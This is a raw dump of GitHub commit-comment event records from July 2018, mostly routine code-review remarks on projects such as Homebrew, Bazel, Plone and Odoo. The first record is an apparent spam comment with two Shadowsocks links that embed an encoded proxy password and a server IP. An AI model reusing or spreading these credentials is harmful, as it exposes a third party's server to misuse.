{"id":"7943135927","type":"CommitCommentEvent","actor":{"login":"whezel"},"repo":{"name":"NectarJS/nectarscript"},"payload":{"comment":{"id":29654872,"position":4,"line":30,"path":"nectarscript-0.1.MD","commit_id":"426f89d74df2bec38d73bb5e920820fce7a533b9","created_at":"2018-07-10T11:21:14Z","updated_at":"2018-07-10T11:21:14Z","author_association":"NONE","body":"ss://YWVzLTI1Ni1jZmI6dTFyUldUc3NOdjBw@198.199.101.152:8388\r\nss://YWVzLTI1Ni1jZmI6dTFyUldUc3NOdjBw@198.199.101.152:8388"}},"created_at":"2018-07-10T11:21:14Z"}
{"id":"7943137887","type":"CommitCommentEvent","actor":{"login":"gusc"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654876,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T11:21:40Z","updated_at":"2018-07-10T11:21:40Z","author_association":"NONE","body":"Judging by the [documentation](https://github.com/Homebrew/homebrew-cask/blob/master/doc/cask_language_reference/stanzas/depends_on.md#setting-a-minimum-macos-release) it should actually be `depends_on :macos '>= :sierra'`, but it's still not clear whether brew handles this dependency gracefully (ignores the formula) or as an error (just like with Xcode version)."}},"created_at":"2018-07-10T11:21:40Z"}
{"id":"7943143744","type":"CommitCommentEvent","actor":{"login":"ChaoLingW"},"repo":{"name":"ChaoLingW/HpJiNing"},"payload":{"comment":{"id":29654885,"position":null,"line":null,"path":null,"commit_id":"d698fe8ca1e091440887dafb3680a8d6fa3aa65a","created_at":"2018-07-10T11:23:00Z","updated_at":"2018-07-10T11:23:00Z","author_association":"OWNER","body":"修改代码格式"}},"created_at":"2018-07-10T11:23:00Z"}
{"id":"7943145740","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"shikamaY/meikaiJava_shikama"},"payload":{"comment":{"id":29654890,"position":107,"line":107,"path":"java_ensyu/src/Ensyu9/Ensyu9_2_Day.java","commit_id":"24916eb8eb1cf61eb0a2245a8bf0715759f8f4a4","created_at":"2018-07-10T11:23:25Z","updated_at":"2018-07-10T11:23:25Z","author_association":"COLLABORATOR","body":"こいつは変わらない事が明白なので、定数にしちゃいましょう。\r\n定数名もwdよりはWEEK_DAYSとかの方がわかりやすいかと。(石井)"}},"created_at":"2018-07-10T11:23:25Z"}
{"id":"7943146640","type":"CommitCommentEvent","actor":{"login":"jamflying"},"repo":{"name":"jamflying/jamflying.github.io"},"payload":{"comment":{"id":29654896,"position":null,"line":null,"path":null,"commit_id":"d155b55287051fbe53088baf0ce46e186770797a","created_at":"2018-07-10T11:23:36Z","updated_at":"2018-07-10T11:23:36Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-10T11:23:36Z"}
{"id":"7943147253","type":"CommitCommentEvent","actor":{"login":"hariom5463"},"repo":{"name":"jhlee98y/Marlin_Laser"},"payload":{"comment":{"id":29654897,"position":null,"line":null,"path":null,"commit_id":"2a9c8a7808aab2c0eb0885138187f4c1be9a524c","created_at":"2018-07-10T11:23:44Z","updated_at":"2018-07-10T11:23:44Z","author_association":"NONE","body":"I have tried the same but found many errors. Some where I searched the perfect Arduino IDE its 1.6.0. I will try this one also."}},"created_at":"2018-07-10T11:23:44Z"}
{"id":"7943148794","type":"CommitCommentEvent","actor":{"login":"tony-blockchain"},"repo":{"name":"blockchain/blockchain-wallet-v4-frontend"},"payload":{"comment":{"id":29654900,"position":17,"line":54,"path":"packages/blockchain-wallet-v4-frontend/src/data/components/login/sagas.js","commit_id":"b9163b9686b5039fdd540d9dc5dca5d557813798","created_at":"2018-07-10T11:24:04Z","updated_at":"2018-07-10T11:24:04Z","author_association":"CONTRIBUTOR","body":"it's chan.close()"}},"created_at":"2018-07-10T11:24:04Z"}
{"id":"7943173281","type":"CommitCommentEvent","actor":{"login":"djwhiteastro"},"repo":{"name":"lsst-uk/qservtestbed"},"payload":{"comment":{"id":29654958,"position":null,"line":null,"path":null,"commit_id":"9231bec898b2e17596c78bd7ff027032cc422633","created_at":"2018-07-10T11:29:23Z","updated_at":"2018-07-10T11:29:23Z","author_association":"COLLABORATOR","body":"Renamed to RGM8 (Bob Mann) I assume. Just a typo."}},"created_at":"2018-07-10T11:29:23Z"}
{"id":"7943180351","type":"CommitCommentEvent","actor":{"login":"PratapPuttaswamy"},"repo":{"name":"PratapPuttaswamy/RestTest"},"payload":{"comment":{"id":29654976,"position":null,"line":null,"path":null,"commit_id":"f64993f9236253b15c0187ae557e8e17eda0ad21","created_at":"2018-07-10T11:30:56Z","updated_at":"2018-07-10T11:30:56Z","author_association":"OWNER","body":"yyty"}},"created_at":"2018-07-10T11:30:56Z"}
{"id":"7943180594","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29654977,"position":null,"line":null,"path":null,"commit_id":"b49c662aa4724b4761927a7ceb31bcda35f9880a","created_at":"2018-07-10T11:30:59Z","updated_at":"2018-07-10T11:30:59Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/question-answer-plugin/56032/116\n"}},"created_at":"2018-07-10T11:30:59Z"}
{"id":"7943182402","type":"CommitCommentEvent","actor":{"login":"gusc"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29654986,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T11:31:22Z","updated_at":"2018-07-10T11:31:22Z","author_association":"NONE","body":"Oh, just noticed that, sorry.\r\n\r\nSo you're saying that there is no way to set an actual minimum macOS version for a formula without throwing errors around - like in this case, don't even try to install an upgrade if it depends on newer macOS and leave me be with an older Carthage version?"}},"created_at":"2018-07-10T11:31:22Z"}
{"id":"7943184434","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29654993,"position":4,"line":68,"path":"android/src/com/frostwire/android/offers/MoPubAdNetwork.java","commit_id":"824a22c5b3f1a849b268f50af0752d735005f1ea","created_at":"2018-07-10T11:31:48Z","updated_at":"2018-07-10T11:31:48Z","author_association":"COLLABORATOR","body":"I was wondering if we should revert because of this. They did say that for next updates.\r\nDo you think you could take a look into this @aldenml ?"}},"created_at":"2018-07-10T11:31:48Z"}
{"id":"7943189717","type":"CommitCommentEvent","actor":{"login":"gferna"},"repo":{"name":"gferna/deploys"},"payload":{"comment":{"id":29655011,"position":null,"line":null,"path":null,"commit_id":"7cdb90193a500be8814c452d0ebe2ac58c43d2f3","created_at":"2018-07-10T11:33:01Z","updated_at":"2018-07-10T11:33:01Z","author_association":"OWNER","body":"Qué ratilla, les has metido al final el 0.33 de pro tb... no perdonas una!"}},"created_at":"2018-07-10T11:33:01Z"}
{"id":"7943189724","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29655012,"position":4,"line":68,"path":"android/src/com/frostwire/android/offers/MoPubAdNetwork.java","commit_id":"824a22c5b3f1a849b268f50af0752d735005f1ea","created_at":"2018-07-10T11:33:01Z","updated_at":"2018-07-10T11:33:01Z","author_association":"COLLABORATOR","body":"now that I remember, I think the problem was that if we did the initialization call, then we had shutdown issues where FrostWire would keep re-starting and showing up on the notifications if there were transfers at Exit time."}},"created_at":"2018-07-10T11:33:01Z"}
{"id":"7943193752","type":"CommitCommentEvent","actor":{"login":"xueruini"},"repo":{"name":"xueruini/thuthesis"},"payload":{"comment":{"id":29655026,"position":11,"line":1830,"path":"thuthesis.dtx","commit_id":"1158f1509e476d4da838649969a413ea16424a3b","created_at":"2018-07-10T11:33:54Z","updated_at":"2018-07-10T11:33:54Z","author_association":"OWNER","body":"To me, this seems too tricky to use the fonts correctly. "}},"created_at":"2018-07-10T11:33:54Z"}
{"id":"7943204600","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":29655045,"position":null,"line":null,"path":null,"commit_id":"0afaa59c0fd94bfc14c5bb2196e83018715a79bd","created_at":"2018-07-10T11:36:18Z","updated_at":"2018-07-10T11:36:18Z","author_association":"NONE","body":"@iham Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.discussion/74/violations\n```\nplone/app/discussion/browser/comment.py:16:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_conversation.py:23:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_functional.py:34:18: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-10T11:36:18Z"}
{"id":"7943205786","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":29655048,"position":16,"line":16,"path":"Formula/carthage.rb","commit_id":"f74d9ba598c9843552450abeb382cacd0e71d4c0","created_at":"2018-07-10T11:36:32Z","updated_at":"2018-07-10T11:36:32Z","author_association":"MEMBER","body":"As I said above, you can `brew pin carthage` and `brew upgrade --ignore-pinned`. Alternatively, [create a tap](https://github.com/Homebrew/brew/blob/master/docs/How-to-Create-and-Maintain-a-Tap.md#how-to-create-and-maintain-a-tap) with your own `carthage@0.23` formula, and `brew uninstall carthage` and brew install carthage@0.23`.\r\n\r\nBut no there is nothing we can do for you in the Homebrew/homebrew-core formula. The behavior you're seeing is correct and intentional."}},"created_at":"2018-07-10T11:36:32Z"}
{"id":"7943207796","type":"CommitCommentEvent","actor":{"login":"powercombo"},"repo":{"name":"powercombo/dir"},"payload":{"comment":{"id":29655054,"position":1,"line":1,"path":"README.md","commit_id":"dc7c8024afe211e1cf8f59d1d8e94679d0a85845","created_at":"2018-07-10T11:36:59Z","updated_at":"2018-07-10T11:36:59Z","author_association":"OWNER","body":"..."}},"created_at":"2018-07-10T11:36:59Z"}
{"id":"7943209884","type":"CommitCommentEvent","actor":{"login":"ntinti"},"repo":{"name":"cbsd/cbsd"},"payload":{"comment":{"id":29655055,"position":null,"line":null,"path":null,"commit_id":"373735113a796e5f9ff1fa1ed465bd7b13ce3d70","created_at":"2018-07-10T11:37:25Z","updated_at":"2018-07-10T11:37:25Z","author_association":"NONE","body":"You are very very fast 👍 "}},"created_at":"2018-07-10T11:37:25Z"}
{"id":"7943213063","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":29655063,"position":null,"line":null,"path":null,"commit_id":"5fac6f2df04b770685bb5f44d783f4c8595cbbff","created_at":"2018-07-10T11:38:06Z","updated_at":"2018-07-10T11:38:06Z","author_association":"NONE","body":"@iham Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.discussion/75/violations\n```\nplone/app/discussion/browser/comment.py:16:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_conversation.py:23:1: I001 isort found an import in the wrong position\nplone/app/discussion/tests/test_functional.py:34:18: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-10T11:38:06Z"}
{"id":"7943215803","type":"CommitCommentEvent","actor":{"login":"shaikmagbulbasha"},"repo":{"name":"shaikmagbulbasha/New-one"},"payload":{"comment":{"id":29655070,"position":null,"line":null,"path":null,"commit_id":"44072994a41b73bb5d73901199e6f23ee1c9f472","created_at":"2018-07-10T11:38:44Z","updated_at":"2018-07-10T11:38:44Z","author_association":"OWNER","body":"Every one can have this code now."}},"created_at":"2018-07-10T11:38:44Z"}
{"id":"7943216329","type":"CommitCommentEvent","actor":{"login":"HMJW"},"repo":{"name":"HLT-2018/CIP"},"payload":{"comment":{"id":29655071,"position":81,"line":129,"path":"CRF/crf.py","commit_id":"bd93b51d0b89877e78b1aa90ae9c8f8bb88daef8","created_at":"2018-07-10T11:38:50Z","updated_at":"2018-07-10T11:38:50Z","author_association":"COLLABORATOR","body":"sb"}},"created_at":"2018-07-10T11:38:50Z"}
{"id":"7943223781","type":"CommitCommentEvent","actor":{"login":"zepinglee"},"repo":{"name":"xueruini/thuthesis"},"payload":{"comment":{"id":29655079,"position":11,"line":1830,"path":"thuthesis.dtx","commit_id":"1158f1509e476d4da838649969a413ea16424a3b","created_at":"2018-07-10T11:40:26Z","updated_at":"2018-07-10T11:40:26Z","author_association":"COLLABORATOR","body":"It seems to be the only interface provided by `unicode-math` since the package doesn't honor the `intlimit` option of the `amsmath` package."}},"created_at":"2018-07-10T11:40:26Z"}
{"id":"7943226394","type":"CommitCommentEvent","actor":{"login":"barkha56"},"repo":{"name":"barkha56/GradleDemo"},"payload":{"comment":{"id":29655089,"position":null,"line":null,"path":null,"commit_id":"ac226cc584c7c1edca957f9b66321e4d2b7ed5e3","created_at":"2018-07-10T11:40:58Z","updated_at":"2018-07-10T11:40:58Z","author_association":"OWNER","body":"added jar file"}},"created_at":"2018-07-10T11:40:58Z"}
{"id":"7943227645","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29655090,"position":28,"line":69,"path":"src/main/java/com/google/devtools/build/lib/exec/FilesetManifest.java","commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-10T11:41:15Z","updated_at":"2018-07-10T11:41:15Z","author_association":"CONTRIBUTOR","body":"**tl;dr**: I'm certain that `ByteSource` deals with closing the input stream for you.\r\n\r\nIt's my personal understanding that all methods in `ByteSource` that do \"convenience\" things like `ByteSource.copyTo(ByteSink)` and `ByteSource.read()` internally manage opening, reading from and closing input streams, so that the user doesn't have to.\r\n\r\nI think this bullet point in the class javadoc backs my understanding:\r\n\r\n> - **Convenience methods:** These are implementations of common operations that are typically implemented by opening a stream using one of the methods in the first category, doing something and finally closing the stream that was opened.\r\n\r\nI actually have the source code for `ByteSource` open in front of me with right now [1], and looking at the implementations of methods such as `read()` and `copyTo()`, it looks to me that they internally open input streams using `openStream()` and then register them with Guava `Closer`s, which act as internal try-with-resources blocks. So when you create `ByteSource` anon subclasses and override `openStream()` with pre-existing input streams, they get automatically closed, regardless of whether you wrap the pre-existing input streams in outer try-with-resources blocks or not.\r\n\r\nThe only methods I see which _don't_ register anything with `Closer`s are those methods which either explicitly return input streams, e.g. `open[Buffered]Stream()`, or those methods which don't create any input streams to begin with, e.g. `asCharSource()`, `concat()` and `empty()`.\r\n\r\nThere's also this warning in the wiki [2] which says:\r\n\r\n> **Note:** While it can be tempting to create a source or sink that wraps an _open_ stream (such as an `InputStream`), this should be avoided. Your source/sink should instead open a new stream each time its `openStream()` method is called. This allows the source or sink to control the full lifecycle of that stream and allows it to be usable multiple times rather that becoming unusable the first time any method on it is called. Additionally, if you're opening the stream before creating the source or sink you may still have to deal with ensuring that the stream is closed correctly if an exception is thrown elsewhere in your code, which defeats many of the advantages of using a source or sink in the first place.\r\n\r\nIn conclusion, I'm confident that explicitly opening a new input stream and wrapping it in a new anon subclass of `ByteSource` each time is simply unnecessary, and that just calling e.g. `FileSystemUtils.asByteSource(file)` will do the trick. :)\r\n\r\n[1] https://github.com/google/guava/blob/master/guava/src/com/google/common/io/ByteSource.java\r\n[2] https://github.com/google/guava/wiki/IOExplained#sources-and-sinks"}},"created_at":"2018-07-10T11:41:15Z"}
{"id":"7943236395","type":"CommitCommentEvent","actor":{"login":"new-world-kami"},"repo":{"name":"goddlts/itcast_store46"},"payload":{"comment":{"id":29655106,"position":2,"line":2,"path":"src/assets/css/style.css","commit_id":"a5c59e20a747176440f1283ec0039913d28e8a20","created_at":"2018-07-10T11:43:08Z","updated_at":"2018-07-10T11:43:08Z","author_association":"NONE","body":"牛老师 厉害"}},"created_at":"2018-07-10T11:43:08Z"}
{"id":"7943239023","type":"CommitCommentEvent","actor":{"login":"bitbrain"},"repo":{"name":"libgdx/box2dlights"},"payload":{"comment":{"id":29655120,"position":null,"line":null,"path":null,"commit_id":"08cf93a41464f71d32475aaa2fe280dc6af78ff3","created_at":"2018-07-10T11:43:41Z","updated_at":"2018-07-10T11:43:41Z","author_association":"NONE","body":"![gandalf](https://user-images.githubusercontent.com/822035/42507959-db75e2ce-843e-11e8-8d68-f9b6053e68f5.gif)\r\n"}},"created_at":"2018-07-10T11:43:41Z"}
{"id":"7943241036","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29655126,"position":22,"line":87,"path":"app/src/main/java/d/d/meshenger/ContactSqlHelper.java","commit_id":"4cb79456e0706e7afebf6d60a3836ec156a3c62f","created_at":"2018-07-10T11:44:08Z","updated_at":"2018-07-10T11:44:08Z","author_association":"NONE","body":"Müssen die Zeichenketten bei der Rückgabe wieder unescaped werden oder so?"}},"created_at":"2018-07-10T11:44:08Z"}
{"id":"7943246059","type":"CommitCommentEvent","actor":{"login":"Bluelerry"},"repo":{"name":"Bluelerry/Kyyliieh"},"payload":{"comment":{"id":29655130,"position":null,"line":null,"path":null,"commit_id":"0715239ccb8bf488afc07c9b3e12e6c1f790029f","created_at":"2018-07-10T11:45:13Z","updated_at":"2018-07-10T11:45:13Z","author_association":"OWNER","body":"Os comandos em erro"}},"created_at":"2018-07-10T11:45:13Z"}
{"id":"7943247371","type":"CommitCommentEvent","actor":{"login":"most323"},"repo":{"name":"most323/pythonTest"},"payload":{"comment":{"id":29655134,"position":4,"line":4,"path":"기말고사.py","commit_id":"67670f39c6da6e824f540b0319b0620c6c99f3de","created_at":"2018-07-10T11:45:29Z","updated_at":"2018-07-10T11:45:29Z","author_association":"OWNER","body":"i는 삭제하시는게 좋을 것 같아요"}},"created_at":"2018-07-10T11:45:29Z"}
{"id":"7943248545","type":"CommitCommentEvent","actor":{"login":"Bluelerry"},"repo":{"name":"Bluelerry/Kyyliieh"},"payload":{"comment":{"id":29655135,"position":2,"line":2,"path":"8ball_error_command","commit_id":"0715239ccb8bf488afc07c9b3e12e6c1f790029f","created_at":"2018-07-10T11:45:44Z","updated_at":"2018-07-10T11:45:44Z","author_association":"OWNER","body":"error"}},"created_at":"2018-07-10T11:45:44Z"}
{"id":"7943250196","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29655138,"position":5,"line":81,"path":"src/method_iar.jl","commit_id":"3977bed039a2d161339e4a4f79c9ee7eafb63b28","created_at":"2018-07-10T11:46:06Z","updated_at":"2018-07-10T11:46:06Z","author_association":"CONTRIBUTOR","body":"We do not want to check the error at the very first iteration. This will give an error in several specific cases, for example\r\n\r\nn=4; A0=rand(n,n); A1=zeros(A0);\r\nnep=SPMF_NEP([eye(n), A0, A1],[λ->-λ^2,λ->eye(λ),λ->expm(-λ)])\r\nλ,Q,err,V = iar(nep,maxit=10,Neig=8,σ=0.0,γ=1,displaylevel=1,check_error_every=1);"}},"created_at":"2018-07-10T11:46:06Z"}
{"id":"7943250910","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29655141,"position":28,"line":69,"path":"src/main/java/com/google/devtools/build/lib/exec/FilesetManifest.java","commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-10T11:46:15Z","updated_at":"2018-07-10T11:46:15Z","author_association":"CONTRIBUTOR","body":"**Revised tl;dr:** I'm certain that `ByteSource` deals with closing the input stream for you, so reverting back to e.g. `FileSystemUtils.asByteSource(file)` is not only perfectly safe but also the idiomatic way of doing things with `ByteSource`s."}},"created_at":"2018-07-10T11:46:15Z"}
{"id":"7943252583","type":"CommitCommentEvent","actor":{"login":"plaindocs"},"repo":{"name":"hackebrot/labels"},"payload":{"comment":{"id":29655143,"position":null,"line":null,"path":null,"commit_id":"3f64bfa3dcadfaf4963ca6dfff6c8ae1d04a05d5","created_at":"2018-07-10T11:46:36Z","updated_at":"2018-07-10T11:46:36Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-10T11:46:36Z"}
{"id":"7943252696","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29655144,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T11:46:38Z","updated_at":"2018-07-10T11:46:38Z","author_association":"NONE","body":"Why not define a soversion here?"}},"created_at":"2018-07-10T11:46:38Z"}
{"id":"7943257277","type":"CommitCommentEvent","actor":{"login":"Pavithran12"},"repo":{"name":"Pavithran12/icreset"},"payload":{"comment":{"id":29655151,"position":null,"line":null,"path":null,"commit_id":"f8b53cdd0c04ea16d69ef9c9d75f586ca078fcbe","created_at":"2018-07-10T11:47:38Z","updated_at":"2018-07-10T11:47:38Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-10T11:47:38Z"}
{"id":"7943263461","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29655161,"position":5,"line":81,"path":"src/method_iar.jl","commit_id":"3977bed039a2d161339e4a4f79c9ee7eafb63b28","created_at":"2018-07-10T11:49:01Z","updated_at":"2018-07-10T11:49:01Z","author_association":"CONTRIBUTOR","body":"TYPO\r\nif (rem(k,check_error_every)==0)||(k==m)||(k>2) \r\nwill be replaced with\r\nif ((rem(k,check_error_every)==0)||(k==m))&&(k>2)\r\nin the next commit (according to the comment above)"}},"created_at":"2018-07-10T11:49:01Z"}
{"id":"7943267986","type":"CommitCommentEvent","actor":{"login":"Rexxt"},"repo":{"name":"Rexxt/rexxt.github.io"},"payload":{"comment":{"id":29655170,"position":5,"line":7,"path":"index.html","commit_id":"94e432dc087d021b8a9988c590d7c942b7391080","created_at":"2018-07-10T11:49:57Z","updated_at":"2018-07-10T11:49:57Z","author_association":"OWNER","body":"Code Error"}},"created_at":"2018-07-10T11:49:57Z"}
{"id":"7943268539","type":"CommitCommentEvent","actor":{"login":"sagarvora"},"repo":{"name":"frappe/frappe"},"payload":{"comment":{"id":29655173,"position":null,"line":null,"path":null,"commit_id":"f4313f6b12a2387c210abb5bbb38b80c33105399","created_at":"2018-07-10T11:50:05Z","updated_at":"2018-07-10T11:50:05Z","author_association":"CONTRIBUTOR","body":"👌"}},"created_at":"2018-07-10T11:50:05Z"}
{"id":"7943269067","type":"CommitCommentEvent","actor":{"login":"henrhoi"},"repo":{"name":"vespa-engine/vespa"},"payload":{"comment":{"id":29655177,"position":null,"line":null,"path":null,"commit_id":"8c3561b7dd58ebe2590543c57a5d4c63731e44e1","created_at":"2018-07-10T11:50:13Z","updated_at":"2018-07-10T11:50:13Z","author_association":"MEMBER","body":"Also changed a few functions, so that the possible options for child-props changes as they get selected."}},"created_at":"2018-07-10T11:50:13Z"}
{"id":"7943275597","type":"CommitCommentEvent","actor":{"login":"lacrioque"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29655192,"position":null,"line":null,"path":null,"commit_id":"ad9f9570f340126142008ba64015865cbcde34b9","created_at":"2018-07-10T11:51:34Z","updated_at":"2018-07-10T11:51:34Z","author_association":"CONTRIBUTOR","body":"ID's are completely unique in terms of HTML specification so it is IMHO the best way to trigger events.\r\nA name and action param can be non unique, and thus ambiguous.\r\nThe AJAX-mode need some tweaking on the theme and this ajaxify is especially made for the base themes.\r\nIf someone wan't to change the html or behaviour he should check to change this file, too."}},"created_at":"2018-07-10T11:51:34Z"}
{"id":"7943282278","type":"CommitCommentEvent","actor":{"login":"restrry"},"repo":{"name":"redux-saga/redux-saga"},"payload":{"comment":{"id":29655219,"position":12,"line":81,"path":"packages/core/src/internal/error-utils.js","commit_id":"9ed43b5e6faa6fac4b8db94362f17ed8e3d57332","created_at":"2018-07-10T11:52:56Z","updated_at":"2018-07-10T11:52:56Z","author_association":"COLLABORATOR","body":"I saw such an approach [here](https://github.com/zertosh/invariant/blob/master/invariant.js#L46) but not sure that would be bulletproof solution for all browsers. anyway I'll do an another experiment "}},"created_at":"2018-07-10T11:52:56Z"}
{"id":"7943283864","type":"CommitCommentEvent","actor":{"login":"romeshRaghavan"},"repo":{"name":"romeshRaghavan/TnE_Dev-APP"},"payload":{"comment":{"id":29655221,"position":null,"line":null,"path":null,"commit_id":"5ad6870561278ecfd702690e42eb152a4113b56e","created_at":"2018-07-10T11:53:16Z","updated_at":"2018-07-10T11:53:16Z","author_association":"OWNER","body":"changes done"}},"created_at":"2018-07-10T11:53:16Z"}
{"id":"7943284695","type":"CommitCommentEvent","actor":{"login":"ezra-obiwale"},"repo":{"name":"aidewoode/vue-letter-avatar"},"payload":{"comment":{"id":29655223,"position":null,"line":null,"path":null,"commit_id":"b5338a24781ab5147f874108ad37d4ee56122f99","created_at":"2018-07-10T11:53:27Z","updated_at":"2018-07-10T11:53:27Z","author_association":"CONTRIBUTOR","body":"@aidewoode Please publish the updates to npm too."}},"created_at":"2018-07-10T11:53:27Z"}
{"id":"7943285582","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655226,"position":35,"line":29,"path":"3-23a/3-23a.cpp","commit_id":"6b888f088218cab061db6196a2069b0b1b7126ac","created_at":"2018-07-10T11:53:39Z","updated_at":"2018-07-10T11:53:39Z","author_association":"COLLABORATOR","body":"合計値がdoubleである必要は無いです。"}},"created_at":"2018-07-10T11:53:39Z"}
{"id":"7943285673","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29655227,"position":null,"line":null,"path":null,"commit_id":"ad9f9570f340126142008ba64015865cbcde34b9","created_at":"2018-07-10T11:53:40Z","updated_at":"2018-07-10T11:53:40Z","author_association":"COLLABORATOR","body":"Yes, and here : need javascript happen for all action button … \r\n\r\nIt work before : WHY update … "}},"created_at":"2018-07-10T11:53:40Z"}
{"id":"7943286556","type":"CommitCommentEvent","actor":{"login":"laszlocsomor"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29655230,"position":28,"line":69,"path":"src/main/java/com/google/devtools/build/lib/exec/FilesetManifest.java","commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-10T11:53:51Z","updated_at":"2018-07-10T11:53:51Z","author_association":"CONTRIBUTOR","body":"Thanks for the detailed explanation. I'm looking at the code and you're right. I stand corrected. :)\r\nI'll revert these changes in a separate commit."}},"created_at":"2018-07-10T11:53:51Z"}
{"id":"7943287417","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29655232,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-10T11:54:02Z","updated_at":"2018-07-10T11:54:02Z","author_association":"MEMBER","body":"`rt.sections_elf_shared` could scan the sections by name for Android then. If you know that all TLS data is in the `.tdata` and `.tbss` sections (and `.tbss` the immediate next section after `.tdata`), deriving the overall address range from the headers shouldn't be that hard; `rt.backtrace.elf` looks up a section by name for example.\r\n\r\nThis way, all code would be in druntime alone, and we needn't worry about making sure `_tlsstart` is the very first TLS var in the final binary (=> first TLS global defined in the object file containing main(), and making sure that object file is the first one given to the linker etc. etc.).\r\nReplacing the other magic symbols this way would IMO generally pay off, e.g., probably getting LLD to work for macOS and simplifying future ports."}},"created_at":"2018-07-10T11:54:02Z"}
{"id":"7943289450","type":"CommitCommentEvent","actor":{"login":"GTHtoman"},"repo":{"name":"GTHtoman/GatherADInfo"},"payload":{"comment":{"id":29655236,"position":null,"line":null,"path":null,"commit_id":"856af262304a94d953a0bcd639322c01ccf3bc8e","created_at":"2018-07-10T11:54:28Z","updated_at":"2018-07-10T11:54:28Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-10T11:54:28Z"}
{"id":"7943291795","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655242,"position":63,"line":53,"path":"3-23a/3-23a.cpp","commit_id":"6b888f088218cab061db6196a2069b0b1b7126ac","created_at":"2018-07-10T11:54:55Z","updated_at":"2018-07-10T11:54:55Z","author_association":"COLLABORATOR","body":"合計値をintにするとここで整数にされてしまうので、小数型にキャストしてあげましょう。"}},"created_at":"2018-07-10T11:54:55Z"}
{"id":"7943292294","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655243,"position":10,"line":46,"path":"odoo/addons/test_read_group/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T11:55:01Z","updated_at":"2018-07-10T11:55:01Z","author_association":"MEMBER","body":"You don't need string labels in those fields. You get the same with\r\n```python\r\ndate = fields.Date()\r\ndatetime = fields.Datetime()\r\n```"}},"created_at":"2018-07-10T11:55:01Z"}
